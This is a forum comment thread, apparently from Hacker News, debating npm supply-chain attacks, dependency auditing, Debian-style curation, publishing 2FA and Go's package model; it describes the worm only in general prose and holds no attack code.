No, there's a pretty standard way of doing things that you can care to learn, and it's very feasible, people shower every day during the week, sometimes they skip if they don't go out during weekends, if it's very cold you can skip a day, and if it's hot you can even shower twice. You don't even need to wash your hair every day. There's nuance that you can learn if you stop being so defeatist about it.
Similarly, you can of course install stripe-js since it's vendored from a paid provider with no incentive to fuck you with malware and with resources to audit dependency code, at any rate they are already a dependency of yours, so adding an npm package does not add a vendor to your risk profile.
Similarly you can add react-hook-form if it's an official react package, however if it isn't, then it's a risk, investigate who uploads it, if it's a random from github with an anime girl or furry image in their profile, maybe not. Especially if the package is something like an unofficial react-mcp-dotenv thing where it has access to critical secrets.
Another fallacy is that you have to rewrite the whole dependency you would otherwise import. False. You are not going to write a generic solution for all use cases, just for your own, and it will be tightly integrated and of higher quality and less space (which helps with bandwidth, memory and CPU caching), because of it. For god's sake, you used an example relating to forms? We've had forms since the dot com boom, how come you are still having trouble with those? You should know them like the back of your hand.
Reductio ad Absurdum may be what you're thinking of, but Straw Man might also apply. Funny enough the responder didn't actually do what you said. They stated of the 600+ dependencies they counted there was only one they felt comfortable implementing themselves. Your accusation of them taking your statement to the extreme is reverse straw man rhetoric; you're misrepresenting their argument as extreme or absurd when it’s actually not.
Reductio ad Absurdum is not a fallacy but a legitimate rhetorical technique where you can point out obvious flaws in logic by taking that logic and applying it to something that people would find ridiculous. Note that this is not the most 'extreme' version, it is the same version, using the same logic.
Example:
Argument: People should be able to build whatever they want on their own property.
Reductio ad Absurdum position: I propose to build the world's largest Jenga tower next to your house.
Note that this does not take into account any counter arguments such as 'if it falls on me you will still be liable for negligence', but it makes a point without violating the logic of the original argument. To violate that logic would indeed be a straw man.
Just wanted to comment that chatgpt also wrongly categorizes this as reductio ad absurdum and strawman.
This is very dead internet theory, but not automated, someone copied my comment, gave it to chatgpt, and returned the chatgpt answer, presumably passing it off as their own, but in effect we are talking with chatgpt lol.
It wouldn't be that annoying if it weren't wrong, I guess.
React has zero dependencies and Stripe has one... What else do you need?
I guess this is a joke, but imo it shouldn't be.
Not entirely a joke actually. For example, I have worked at a large corp where dependencies were high discouraged. For example lodash was not used in the codebase I was working on and if you really needed something from lodash you were encouraged to copy-paste the function. This won't work for large libraries of course but the copy-paste-first mentality is not a bad one.
I'm all for disregarding DRY and copypasting code you wrote.
But I think for untrusted third party code, it's much better to copy the code by hand, that way you are really forced to audit it. There really isn't much of an advantage to copying an install.sh script compared to just downloading a running the .sh, whereas writing the actual .sh commands on the command line (and following any other URLs before executing them) is golden.
wonder how long for llms to spew the malware in those packages along the code when you request the same functionality.
would you pay a subscription for a vetted repo?
If you pull something into your project, you're responsible for it working. Full stop. There are a lot of ways to manage/control dependencies. Pick something that works best for you, but be aware, due diligence, like maintenance is ultimately your responsibility.
Oh I'm well aware, and that's the problem. Unfortunately none of the available options hit anything close to the sweet spot that makes me comfortable.
I don't think this is a particularly unreasonable take; I'm a relative novice to the JS ecosystem, and I don't feel this uncomfortable taking on dependencies as I do in pretty much any other ecosystem I participate in, even those (like Rust) where the dependency counts can be high.
Acknowledging your responsibility doesn't make the problem go away. It's still better to have extra layers of protection.
I acknowledge that it is my responsibility to drive safely, and I take that responsibility seriously. But I still wear a seat belt and carry auto insurance.
Almost all software has a no warranty clause. I am not a lawyer but in pretty plain English every piece of software I have ever used has said exactly that I can fuck off if I expect it to work or do anything.
To clarify - I dont think it is naive to assume the software is as-is with all responsibilities on the user since that is exactly what lawyers have made all software companies say that for over 50 years.
Product liability is coming for software. Warranty disclaimers in licenses will be rendered ineffective by the end of 2026 at the latest.
this seems highly unlikely. Almost all of the software we're discussing in this context has little or no resources behind it. No lawyers are going to sue an OSS developer because there's no payday.
Source? An open source library is not necessarily a ‘product’ at all.
No source because it's not real. There's talk about final products and making the companies selling them responsible. But open source developers are not responsible.
only if you pay for it… otherwise you are liable but don't have anyone else to blame.
I'm not sure what your point is. I was saying it's naive to think that everyone is going to review all dependencies, and we can do better than requiring them to.
I thought my point was clearly made the 1st time.
How can we promise to "do better" when shit like "no author or distributor accepts responsibility to anyone for the consequences of using it or for whether it serves any particular purpose or works at all" is in the legal agreement of the software you are using?
Making someone agree to that while simultaneously on the side making promises that the software works is used car salesman gimmicks. The only things that matters is what you put in writing.
> How can we promise to "do better" when shit like "no author or distributor accepts responsibility to anyone
One way or another that will end.
Free Software will have the same responsibilities. If you write software, negligently, and it causes damage, you will be liable
I should not be able to make a Crypto wallet that is easy to hack and distribute it without consequence
This will be a very good thing
We know how to make secure 4eliable software (some of us) but nobody will pay for it
This happens because there's no auditing of new packages or versions. The distro's maintainer and the developer is the same person.
The general solution is to do what Debian does.
Keep a stable distro where new packages aren't added and versions change rarely (security updates and bugfixes only, no new functionality). This is what most people use.
Keep a testing/unstable distro where new packages and new versions can be added, but even then added only by the distro maintainer, NOT by the package developers. This is where the audits happen.
NPM, Python, Rust, Go, Ruby all suffer from this problem, because they have centralized and open package repositories.
This is a culture issue with developers who find it OK to have hundreds of (transitive) dependencies, and then follow processes that, for all intents and purposes, blindly auto update them, thereby giving hundreds of third-parties access to their build (or worse) execution environments.
Adding friction to the sharing of code doesn't absolve developers from their decision to blindly trust a ridiculous amount of third-parties.
I find that the issue is much more often not updating dependencies often enough with known security holes, than updating too often and getting hit with a supply-chain malware attack.
There have been several recent supply chain attacks that show attackers are taking advantage of this (previously sensible) mentality. So it is time to pivot and come up with better solutions before it spirals out of control.
A model that Linux distros follow would work to an extent: you have developed of packages and separate maintainers who test and decide to include or exclude packages and versions of packages. Imagine a JS distro which includes the top 2000 most popular libraries that are all known to work with each other. Your project can pull in any of these and every package is cryptographically signed off on by both the developers and the maintainer.
Vulnerabilities in Linux distro packages obviously happen. But a single developer cannot push code directly into for example Debian and compromise the world.
Not updating is the other side of the same problem: library owners feel it is ok to make frequent backwards-compatibility breaking changes, often ignoring semver conventions. So consumers of their libraries are left with the choice to pin old insecure versions or spend time rewriting their code (and often transitive dependency code too) to keep up.
This is what happens when nobody pays for anything and nobody feels they have a duty to do good work for free.
>This is what happens when nobody pays for anything and nobody feels they have a duty to do good work for free.
Weirdly, some of the worst CVE I can think of were with enterprize software.
That's because there many people don't feel like it is their duty to do good work, even though they are paid ...
Who do you mean with "many people"? Developers who do not care or middle management that oversold features and overcommitted w.r.t. deadlines? Or both? Someone else?
I was thinking of many developers, but actually middle management should be included.
And the CEO. And lawmakers
It's not unreasonable to trust large numbers of trustworthy dependency authors. What we lack are the institutions to establish trust reliably.
If packages had to be cryptographically signed by multiple verified authors from a per-organization whitelist in order to enter distribution, that would cut down on the SPOF issue where compromising a single dev is enough to publish multiple malware-infested packages.
"Find large numbers of trustworthy dependency authors in your neighborhood!"
"Large numbers of trustworthy dependency authors in your town can't wait to show you their hottest code paths! Click here for educational livecoding sessions!"
I don't understand your critique.
Establishing a false identity well enough to fool a FOSS author or organization is a lot of work. Even crafting a spear phishing email/text campaign doesn't compare to the effort you'd have to put in to fool a developer well enough to get offered publishing privileges.
Of course it's possible, but so are beat-them-with-a-five-dollar-wrench attacks.
It IS unreasonable to trust individual humans across the globe in 100+ different jurisdictions pushing code that gets bundled into my application.
How can you guarantee a long trusted developer doesn't have a gun pointed to their head by their authoritarian govt?
In our B2B shop we recently implemented a process where developers cannot add packages from third party sources - only first party like meta, google, spring, etc are allowed. All other boilerplate must be written by developers, and on the rare occasion that a third party dependency is needed it's copied in source form, audited and re-hosted on our internal infrastructure with an internal name.
To justify it to business folks, we presented a simple math where I added the man-hours required to plug the vulnerabilities with the recurring cost of devsecops consultants and found that it's cheaper to reduce development velocity by 20-25%.
Also devsecops should never be offshored due to the scenario I presented in my second statement.
You've presented your argument as if rebutting mine, but to my mind you've reinforced my first paragraph:
* You are trusting large numbers of trustworthy developers.
* You have established a means of validating their trustworthiness: only trust reputable "first-party" code.
I think what you're doing is a pretty good system. However, there are ways to include work by devs who lack "first-party" bona-fides, such as when they participate in group development where their contributions are consistently audited. Do you exclude packages published by the ASF because some contributions may originate from troublesome jurisdictions?
In any case, it is not necessary to solve the traitorous author problem to address the attack vector right in front of us, which is compromised authors.
If someone is wondering how effective such an approach is going to be with npm, consider the following:
If you add jest, the popular test runner by Meta, that's adding 300 packages to your dependency graph.
And here we don't yet have a bundler, linter, code formatter, or even web framework.
So good luck with minimizing those dependencies.
Problem is that beyond some threshold number of authors, the probability they're all trustworthy falls to zero.
It's true that smuggling multiple identities into the whitelist is one attack vector, and one reason why I said "cut down" rather than "eliminate". But that's not easy to do for most organizations.
For what it's worth, back when I was active at the ASF we used to vote on releases — you needed at least 3 positive votes from a whitelist of approved voters to publish a release outside the org and there was a cultural expectation of review. (Dunno if things have changed.) It would have been very difficult to duplicate this NPM attack against the upstream ASF release distribution system.
> This is a culture issue with developers who find it OK to have hundreds of (transitive) dependencies, and then follow processes that, for all intents and purposes, blindly auto update them
I do not know about NPM. But in Rust this is common practice.
Very hard to avoid. The core of Rust is very thin, to get anything done typically involves dozens of crates, all pulled in at compile time from any old developer implicitly trusted.
You can write entire applications in Go without resorting to any dependencies, the std lib is quite complete.
Most projects will have a healthy 5-20 dependencies though, with very little nested modules.
See auto update bots on Github. https://docs.github.com/en/code-security/dependabot/dependab... And since Github does it, it must be a good thing, right? Right???
>absolve developers
Doesn't this ultimately go all the way up to the top?
You have 2 devs: one who mostly writes their own code, only uses packages that are audited etc; the other uses packages willy nilly. Who do you think will be hired? Who do you think will be able to match the pace of development that management and executives demand?
Unfortunately that's almost the whole industry. Every software project I've seen has an uncountable amount of dependencies. No matter if npm, cargo, go packages, whatever you name.
Every place I ever worked at made sure to curate the dependencies for their main projects. Heck, in some cases that was even necessary for certifications. Web dev might be a wild west, but as soon as your software is installed on prem by hundreds or thousands of paying customers the stakes change.
Curating dependencies won't prevent all supply chain attacks though
Zero-external-dependency Go apps are far more feasible than Rust or Node, simply because of the size and quality of the standard library.
Just the other day someone argued with me that it was reasonable for Limbo (the SQLite Rust rewrite) to have 3135 dependencies (of those, 1313 Rust dependencies).
Even more wild considering that SQLite prides itself on having zero dependencies. Sounds like a doomed project.
This is incredible.
At this rate, there's a non-zero chance that one of the transitive dependencies is SQLite itself.
3 different types of sqlite, 14 different versions total: https://github.com/tursodatabase/turso/network/dependencies?...
Looks like they're all pulled in as dev dependencies. libsqlite3-sys gets pulled in by rusqlite, which is used by core_tester, limbo_sim, write-throughput-sqlite, and as a dev_dependency for turso_core.
But it will be safe SQlite, called from Rust.
Yeah. You have dev dependencies in there, those alone will increase number of dependencies by ~500, without ending up in the final product.
Those numbers are way off their actual number.
Right. Allowing 500 strangers to push code to our CI infra, or developer laptops, with approximately zero review, sounds similarly ill advised.
That JLR got their factories hacked, rather than customer cars, is less bad for sure. But it's still pretty bad.
Also, before arguing that code generators should get a pass as they don't “end up in the final product”, you really should read “Reflections on trusting trust” by Ken Thompson.
> Right. Allowing 500 strangers to push code to our CI infra
That's bullshit, pure and simple. If you pull in a deeply nested dependency like icu_normalizer it has 30 dependencies, OMGHAXOZRS. I'm doing this, so I don't have to spend a day going through the library.
Except of the 30 depedencies crates, there are 10 from ICUX repository, and then you have almost standard dependencies like proc-macro/syn/quote crates from dtolnay, `zerofrom` from Google. `smallvec` from the Servo project, and yoke from... checks notes... from ICUX.
The only few remaining crates here are `write16`, `utf8_iter` and `utf16_iter` that are written from hsivonen, who is also a ICUX contributor.
So even for 30 dependencies, you actually depend on proc-macro/syn/quote which are foundational crates. Few crates from Google, few crates from Servo, and three crates written by another ICUX contributor.
We started with 30 dependencies and ended up with 3 strangers
It's great that you did that due diligence once. It really is. If I were reviewing that merge request, and you told me that, I'd be inclined to approve.
But how do we scale that to 1000 dependencies, and every one of their updates? What tools are there to help us, and does the community at large use them?
What I really don't like, and why I wrote that it's a culture issue, is the lightness with which these decisions are often made.
My most popular library has about a dozen dependencies. The README states clearly and “above the fold” what are the core deps (3, no transitive). Every other dependency is either first party, or optional and justified with a comment in the deps file (if you don't use the optional feature, it doesn't end up in your deps file).
There's also a generated BLOB. The generation of the BLOB is reproducible in your own environment, and its provenance attestated.
Those are all risks, that I'm passing on to my users, but I do my best to mitigate them, and communicate this clearly to them.
> But how do we scale that to 1000 dependencies, and every one of their updates? What tools are there to help us, and does the community at large use them?
Use
cargo install cargo-supply-chain
cargo supply-chain --publishers
Run it for whatever you want to check, then have a lunch, it takes 10-30min.It will list exactly how many organizations, and even individuals with publish rights are there. For turso there are 51 repositories, and 243 different individuals with publish rights.
Of course, this still doesn't group by github org and so on.
Sorry, I don't know much about the subject, so this is not a rhetorical or even just loaded question:
Isn't it actually the case that you started with 3 strangers, but 27 of them were relatively easy (still took some time) to figure out as safe?
You have 30 items you bought from various stores. You bought ~20 from yourself, around 5 from Google, 4 from hsivonen and one from servo.
You could of course investigate individuals commits, but that's probably an overkill.
Even 50 seems unreasonable...
Rather than adding friction there is something else that could benefit from having as little friction as sharing code: publishing audits/reviews.
Be that as it may, a system that can fail catastrophically will. Security shouldn't be left to choice.
There is another related growing problem in my recent observation. As a Debian Developer, when I try to audit upstream changes before pulling them in to Debian, I find a huge amount of noise from tooling, mostly pointless. This makes it very difficult to validate the actual changes being made.
For example, an upstream bumps a version of a lint tool and/or changes style across the board. Often these are labelled "chore". While I agree it's nice to have consistent style, in some projects it seems to be the majority of the changes between releases. Due to the difficulty in auditing this, I consider this part of the software supply chain problem and something to be discouraged. Unless there's actually reason to change code (eg. some genuine refactoring a human thinks is actually needed, a bug fix or new feature, a tool exposed a real bug, or at least some identifiable issue that might turn into a bug), it should be left alone.
I agree with this and it's something I've encountered when just trying to understand a codebase or track down a bug. There's a bit of the tail wagging the dog as an increasing proportion of commits are "meta-code" that is just tweaking config, formatting, etc. to align with external tools (like linters).
> Unless there's actually reason to change code (eg. some genuine refactoring a human thinks is actually needed, a bug fix or new feature, a tool exposed a real bug, or at least some identifiable issue that might turn into a bug), it should be left alone.
The corollary to this is "Unless there's actually a need for new features that a new version provides, your existing dependency should be left alone". In other words things should not be automatically updated. This is unfortunately the crazy path we've gone down, where when Package X decides to upgrade, everyone believes that "the right thing to do" is for all its dependencies to also update to use that and so on down the line. As this snowballs it becomes difficult for any individual projects to hold the line and try to maintain a slow-moving, stable version of anything.
I'm using difftastic, it cuts down a whole lot of the noise
This looks good! Unfortunately it looks like it also suffers from exactly the same software supply chain problem that we need to avoid in the first place: https://github.com/Wilfred/difftastic/blob/master/Cargo.lock
Edit: also, consider how much of https://github.com/Wilfred/difftastic/commits/master/ is just noise in itself. 15k commits for a project that appears to only be about four years old.
"exactly the same software supply chain problem"
While the crates ecosystem is certainly not immune to supply chain attacks this over generalization is not justified.
There are several features that make crates.io more robust than npm. One of them is that vulnerable versions can be yanked without human intervention. Desperate comments from maintainers like this one[1] from just a few days ago would not happen with crates.io.
There are also features not provided by crates.io that make the situation better. For example you could very easily clone the repo and run
cargo vet
to check how many of the packages had human audits. I'd done it if I was on a computer, but a quick glance at the Cargo.lock file makes me confident that you'd get a significant number.The main issue there is that the maintainer lost access to their account. Yanking malicious packages is better, but even just being able to release new patch versions would've stopped the spread, but they were not able to do so for the packages that didn't have a co-publisher. How would crates.io help in this situation?
FWIW npm used to allow unpublishing packages, but AFAIK that feature was removed in the wake of the left-pad incident [1]. Altho now with all the frequent attacks, it might be worth considering if ecosystem disruption via malicious removal of pacakge would be lesser of two evils, compared to actual malware being distributed.
I'd argue it's more of a culture thing, not technical thing.
In both JavaScript and Rust, it's normal/encouraged to just add a tiny dependency to the package manager. The communities even pride themselves, that they have such good package managers to allow this.
It's this "yeah, there is a crate for this tiny function I need, let's just include it" mentality that makes the ecosystem vulnerable.
People need to be responsible for whatever they include, either pay the price by checking all versions up front, or pay it by risking shipping a vulnerable program that it's much harder to retract than a JavaScript frontend.
In Rust we have cargo vet, where we share these audits and use them in an automated fashion. Companies like Google and Mozilla contribute their audits.
I wish cargo went with crev instead, that has a much better model for distributed code audits.
Nuget, Powershell gallery, the marketplaces for VSCode/VS/AZDo and the Microsoft Store too. Probably another twenty.
They collect package managers like funko pops.
I'm not quite sure about the goal. Maybe some more C# dev kit style rug-pulls where the ecosystem is nominally open-source but MS own the development and distribution so nobody would bother to compete.
I took those acquisitions and a few others like LinkedIn and all the visual studio versions as a sign that Microsoft is trying to own the software engineer career as a domain.
And it's a great idea, similar thematically to certificate transparency
How to backport security fixes to vetted packages?
I'd like to think there are ways to do this and keep things decentralized.
Things like: Once a package has more than [threshold] daily downloads for an extended period of time, it requires 2FA re-auth/step-up on two separate human-controlled accounts to approve any further code updates.
Or something like: for these popular packages, only a select list of automated build systems with reproducible builds can push directly to NPM, which would mean that any malware injector would need to first compromise the source code repository. Which, to be fair, wouldn't necessarily have stopped this worm from propagating entirely, but would have slowed its progress considerably.
This isn't a "sacrifice all of NPM's DX and decentralization" question. This is "a marginally more manual DX only when you're at a scale where you should be release-managing anyways."
> two separate human-controlled accounts to approve any further code updates.
Except most projects have 1 developer… Plus, if I develop some project for free I don't want to be wasting time and work for free for large rich companies. They can pay up for code reviews and similar things instead of adding burden to developers!
I think that we should impose webauthn 2fa on all npm accounts as the only acceptable auth method if you have e.g., more than 1 million total downloads.
Someone could pony up the cash to send out a few thousand yubikeys for this and we'd all be a lot safer.
Why even put a package download count on it? Just require it for everything submitted to NPM. It's not hard.
Because then it's extra hassle and expense for new developers to publish a package, and we're trying to keep things decentralized.
It's already centralized by virtue of using and relying on NPM as the registry.
If we want decentralized package management for node/javascript, you need to dump NPM - why not something like Go's system which is actually decentralized? There is no package repository/registry, it's all location based imports.
Decentralized? This is a centralized package registry. There is nothing decentralized about it.
oh right, good point, I wonder when somebody will just sue NPM for any damage caused. That's really the only way we'll see change I think.
Download counters are completely useless. I could download your package 2 million times in under a minute and cause you to need the 2FA.
And true 2FA means you can't automate publishing from github's CI. Python is going the other direction. There is a fake 2FA that is just used to generate tokens and there is a preferential channel to upload to pypi via github's CI.
But in my opinion none of this helps with security. But it does help to de-anonymise the developers, which is probably what they really want to do, without caring if those developers get hacked and someone else uses their identity to do uploads.
I don’t understand what benefits this kind of “decentralization” offers
Larger pool of people you can hack/blackmail/coerce into giving you access to millions of systems :)
Even the simplest "any maintainer can click a push notification on their phone to verify that they want to push an update to $package" would have stopped this worm in its tracks!
How would that work for CI release flows? I have my Rust crates, for example, set up to auto-publish whenever I push a tag to its repo.
PyPI already has this. It was a little bit annoying when they imposed stricter security on maintainers, but I can see the need.
Pypi did that, i got 2 google keys for free. But I used them literally once, to create a token that never expires and that is what I actually use to upload on pypi.
(I did a talk at minidebconf last year in toulouse about this).
If implemented like this, it's completely useless, since there is actually no 2fa at all.
Anyway the idea of making libre software developers work more is a bad idea. We do it for fun. If we have to do corporate stuff we want a corporate salary to go with.
You can use debian's version of your npm packages if you'd like. The issues you're likely to run into are: some libraries won't be packaged period by debian; those that are might be on unacceptably old versions. You can work around these issues by vendoring dependencies that aren't in your distro's repo, ie copying a particular version into your own source control, manually keeping up with security updates. This is, to my knowledge, what large tech companies do. Other companies that don't are either taking a known risk with regards to vulnerabilities, or are ignorant. Ignorance is very common in this industry.
Distros are struggling with the amount of packages they have to maintain and update regularly. That's one of the main reasons why languages built their own ecosystems in the first place. It became popular with CPAN and Maven and took off with Ruby gems.
Linux distros can't even provide all the apps users want, that's why freshmeat existed and we have linuxbrew, flatpak, Ubuntu multiverse, PPA, third party Debian repositories, the openSUSE Buildservice, the AUR, ...
There is no community that has the capacity to audit and support multiple branches of libraries.
The lack of an easy method to automatically pull in and manage dependencies in C/C++ is starting to look a lot more like a feature than a bug now.
Author of Odin is also against adding a package manager: https://www.gingerbill.org/article/2025/09/08/package-manage...
But there's so much UB in C++ that can be exploited that I doubt attackers lament the lack of a module system to target. ;)
To be clear, Debian does not audit code like you might be suggesting they do. There are checks for licensing, source code being missing, build reproducibility, tests and other things. There is some static analysis with lintian, but not systematically at the source code level with tools like cppcheck or rust-analyzer or similar. Auditing the entirety of the code for security issues just isn't feasible for package maintainers. Malware might be noticed while looking for other issues, that isn't guaranteed though, the XZ backdoor wasn't picked up by Debian.
> The general solution is to do what Debian does.
The problem with this approach is that frameworks tend to "expire" pretty quickly and you can't run anything for too long on Debian until the framework is obsolete. What I mean by obsolete is Debian 13 ships with Golang 1.24, A year from now it's gonna be Golang 1.26 - that is not being made available in trixie. So you have to find an alternative source for the latest golang deb. Same with PHP, Python etc. If you run them for 3 years with no updated just some security fixes here and there, you're gonna wake up in a world of hurt when the next stable release comes out and you have to do en-masse updates that will most likely require huge refactoring because syntax, library changes and so on.
And Javascript is a problem all by itself where versions come up every few months and packages are updated weekly or monthly. You can't run any "modern" app with old packages unless you accept all the bugs or you put in the work and fix them.
I am super interested in a solution for this that provides some security for packages pushed to NPM (the most problematic repository). And for distributions to have a healthy updated ecosystem of packages so you don't get stuck who knows for how long on an old version of some package.
And back to Debian, trixie ships with nginx 1.26.3-3+deb13u1. Why can't they continuously ship the latest stable version if they don't want to use the mainline one?
> Keep a stable distro where new packages aren't added and versions change rarely (security updates and bugfixes only, no new functionality). This is what most people use.
Unfortunately most people don't want old software that doesn't support newer hardware so most people don't end up using Debian stable.
It'd be interesting to see how much of the world runs on Debian containers, where most of the whole "it doesn't support my insert consumer hardware here" argument is completely moot.
I don't know why you went with hardware.
Most people don't want old software because they don't want old software.
They want latest features, fixes and performance improvements.
What hardware isn't supported by Debian stable that is supported by unstable?
Or is this just a "don't use Linux" gripe?
I haven't had much problems prior but Blackwell support was really buggy for the first two weeks.
Enable the Backport sources. The recent kernels there have supported all my modern personal devices.
> Unfortunately most people don't want old software
"old" is a strange way to spell "new, unstable, and wormed".
I want old software. Very little new features are added to most things i care about, mostly it is just bloat, AI slop, and monthly subscription shakedowns being added to software today.
So, who is going to audit the thousands of new packages/versions that are published to npm every day? It only works for Debian because they hand-pick popular software.
Maybe NPM should hand pick popular packages and we should get away from this idea of every platform should always let everyone publish. Curation is expensive, but it may be worthwhile for mature platforms.
This is maybe where we could start getting into money into the opensource ecosystems.
One idea I've had is that publishing is open as today, but security firms could offer audit signatures.
So a company might pay security firms and only accept updates to packages that have been audited by by 1,2,3 or more of their paid services.
Thus money would be paid in the open to have eyes on changes for popular packages and avoid the problem of that weird lone maintainer in northern Finland being attacked by the Chinese state.
Errr, you! If you brought the dependency, it is now your job to maintain it and diff every update for backdoor.
I've been arguing a couple of times that the 2 main reasons people want package management in languages are
1. Using an operating system with no package management 2. Poor developer discipline, i.e. developers always trying to use the latest version of a package.
So now we have lots of poorly implemented language package managers, docker containers on top being used as another package management layer (even though that's not their primary purpose but many people use the like that) and the security implications of pulling in lots of random dependencies without any audit.
Developing towards a stable base like Debian would not be a pancea, but alliviate the problems by at least placing another audit layer in between.
Nope. It's because:
1. You don't want to tie your software to the OS. Most people want their software to be cross-platform. Much better to have a language-specific package manager because I'm using the same language on every OS. And when I say "OS" here, I really mean OS or Linux distro, because Linux doesn't have one package manager.
2. OS package managers (where they even exist), have too high a bar of entry. Not only do you have to make a load of different packages for different OSes and distros, but you have to convince all of them to accept them. Waaay too much work for all but the largest projects.
You're probably going to say "Good! It would solve this problem!", but I don't think the solution to package security is to just make it so annoying nobody bothers. We can do better than that.
I actually agree in the context of user software people often want the latest and that Windows and OS don't have proper package management is an issue.
However we are talking in the context of NPM packages which by the vast majority would be running inside a container on some server. So how could that software not use a stable Debian base for example.
And arguing that package management is to complicated is a bit ridiculous considering how many workloads are running in docker containers which I'd argue are significantly more complex
It doesn't matter if the operating system I personally use has a good package manager, I need to release it in a form that all the people using it can work with. There are a lot of OSes out there, with many package managers.
Even if we make every project create packages in every package manager, it still wouldn't add any auditing.
Exactly, in a way Debian (or any other distro) is an extended standard library.
Yeah, after seeing all of the crazy stuff that has been occurring around supply chain attacks, and realizing that latest Debian stable (despite the memes) already has a lot of decent relatively up-to-date packages for Python, it's often easier to default to just building against what Debian provides.
Right. Like NPM, Debian also supports post-install hooks for its packages. Not great (ask Michael Stapelberg)! But this is still a bit better than the NPM situation because at least the people writing the hooks aren't the people writing the applications, and there's some standards for what is considered sane to do with such hooks, and some communal auditing of those hooks' behavior.
Linux distros could still stand to improve here in a bunch of ways, and it seems that a well-designed package ecosystem truly doesn't need such hooks at the level of the package manager at all. But this kind of auditing is one of the useful functions of downstream software distros for sure.
Pretty unfeasible with the variety of packages/ecosystems that get created. You'd either ending up requiring a LOT of dev time looking over packages on the maintainer end, or basically having no packages people need to use in your repository.
Finding the balance of that seems to me like it'd be incredibly difficult.
> NPM, Python, Rust, Go, Ruby all suffer from this problem, because they have centralized and open package repositories
Can you point me to Go's centralized package repository?
That's a doc site and a pull-through cache, neither is a package repository
git isn't centralized nor a package repository
For what it's worth, our code is on GitLab
Github is a centralized repository where the overwhelming majority of Go libraries are hosted.
So GitHub is every single programming language's centralized package repository?
Then what's the difference between git and npm, cargo, pypi, mvn et al?
Git != Github.
In practice, little difference between Go's use of Github and Python's use of PyPI. Someone at Microsoft with root access could compromise everyone.
> Git != Github
That's why I'm putting emphasis on it, because to Go it is.
And to languages that actually have centralized package repositories it isn't. There is a difference between code and packages and Go simply does not have the latter (in the traditional sense - what Go calls a package is a collection of source files in the same directory that are compiled together within a module (a module is a collection of packages (again, code) that are released, versioned, and distributed together. Modules may be downloaded directly from version control repositories or via proxy servers)).
To the other languages mentioned above, packages may have binaries, metadata and special script hooks. There is a package manager like pip , cargo or npm and if you want to install one, you won't have to specify a URL because there is a canonical domain to go to.
Go just knows code and it'll use git, hg or even svn. And if you want to claim that lots of open-source code being on GitHub makes it special, then
> GitHub is every single programming language's centralized package repository
and
> Someone at Microsoft with root access could compromise every user of every single programming language
I think you're being silly to be so insistent about this. 95% of Go packages are hosted on Github, a centralized hosting platform. The fact that they install via the git protocol (or do they? do they just use https to check out?) is immaterial.
95% of Python packages are installed from PyPI, but just like Go can also install from non-Github sources, Python supports installing from other non PyPI indexes[0] or even from a Git repository directly[1] like Go.
> what Go calls a package is a collection of source files in the same directory
What is it that you imagine Python or NPM packages consist of? Hint: A Python .whl file is just a folder in a zip archive (Python also supports source distributions directly analogous to Go)
[0] https://docs.astral.sh/uv/concepts/indexes/
[1] https://thelinuxcode.com/install-git-repository-branch-using...
> 95% of Go packages[=code, the author] are hosted on Github
So "GitHub is every single programming language's centralized package repository, because lots of code is hosted there" ?
> Python supports installing from other non PyPI indexes > 95% of Python packages are installed from PyPI, but just like Go can also install from non-Github sources, Python supports installing from other non PyPI indexes[0] or even from a Git repository directly[1] like Go.
And yet there is a clear difference between source distributions and pip/npm/rubygem/cargo packages - and between tooling/ecosystems that ONLY support the former and those that MAY use either and unfortunately mostly use the latter.
> What is it that you imagine Python or NPM packages consist of?
Something like a script that runs as part of the package that downloads a tarball, modifies package.json, injects a local bundle.js and runs npm publish (see this post). Usually also hosted at the default, centralized, authoritative source run by the maintainers of the package management tool.
But I'm repeating myself.
> (or do they? do they just use https to check out?)
Maybe try it out or read the docs first.
I'm closing with this:
> NPM, Python, Rust, Go, Ruby all suffer from this problem, because they have centralized and open package repositories.
is either wrong or disingenuously misleading, requiring nothing to apply to every single thing, depending on how you slice your definitions. It does not hold any water, that is my entire argument.
k, let me know how your CI pipeline fares the next time there's a Github outage and we can revisit this discussion of Go's fantastic uniquely decentralized dependency management.
You really ought to research a topic before arguing.
For the average user, both GitHub and default $GOPROXY would have to be down. For me, my CI runs where my (and code I've cloned) lives, self-hosted GitLab.
Oh my god, you've figured out caching!? Will wonders never cease! Truly, Golang is the ecosystem of the future free from all centralized dependencies.
In practice, my experience is that this ends up with only old versions of things in the stable package repos. So many times I run into a bug, and then find out that the bug has been fixed in a newer version but it isn't updated in the stable repo. So now you end up pulling an update out of band, and you are in the same boat as before.
I don't know how you avoid this problem
You're overestimating the amount of auditing these distros do for the average package; in reality there is very little.
The reason these compromised packages typically don't make it in to e.g. Debian is because this all tends to be discovered quite quickly, before the package maintainer has a chance to update it.
security updates and bugfixes only
Just wondering: while this is less of an attack surface, it's still a surface?
NX NPM attack (at least the previous wave which targetted tinycolor) relied on running post-install scripts. Go tooling does not give you ways to run post-install scripts, which is much more reasonable approach.
> The general solution is to do what Debian does.
If you ask these people, distributions are terrible and need to die.
Python even removed PGP signatures from Pypi because now attestation happens by microsoft signing your build on the github CI and uploading it directly to pypi with a never expiring token. And that's secure, as opposed to the developer uploading locally from their machine.
In theory it's secure because you see what's going in there on git, but in practice github actions are completely insecure so malware has been uploaded this way already.
For python I use Debian packages wherever possible. What I need is in there usually. I might even say almost always.
Go’s package repository is just GitHub.
At the end of the day, it’s all a URL.
You’re asking for a blessed set of URLs. You’d have to convince someone to spend time maintaining that.
As hair splitting, that's actually not true: Go's package manager is just version control of which GitHub is currently the most popular hosting. And it also allows redirecting to your own version control via `go mod edit -replace` which leaves the sourcecode reference to GitHub intact, but will install it from wherever you like
How does that relate to the bigger conversation here? Are you suggesting people stop pulling Go packages from GitHub and only use local dependencies?
I wasn't trying to relate anything to the bigger conversation, I just meant to draw attention to the fact that GitHub is not golang's package manager
That said, I would guess the 'bigger conversation' is that it is much harder to tpyo <<import "github.com/DataaDog/datadog-api-client-go/v2/api/datadogV2">> than $(npm i dataadog) or similar in a "flat" package namespace (same for its $(uv pip install dataadog) friend)
None of those cited ones fix the dependency lineage issue, proving that release 1.1 was authored by the same chain of custody as release 1.0 of any given package. One can opt in to gpg verified dependencies in Maven, but it is opt-in. The .jar artifacts can also be cryptographically signed, but the risk that's trying to drive down is tamperproofing and not lineage, AFAIK
Golang at least gives you the option to easily vendor-ize packages to your local repository. Given what has happened here, maybe we should start doing this more!
This doesn't really help you. I assume Go records the sha1 hash of the commit it grabs, so it doesn't really matter if you vendor it, or download it every time.
The problem comes when you want to upgrade your dependencies. How do you know that they are trustworthy on first use?
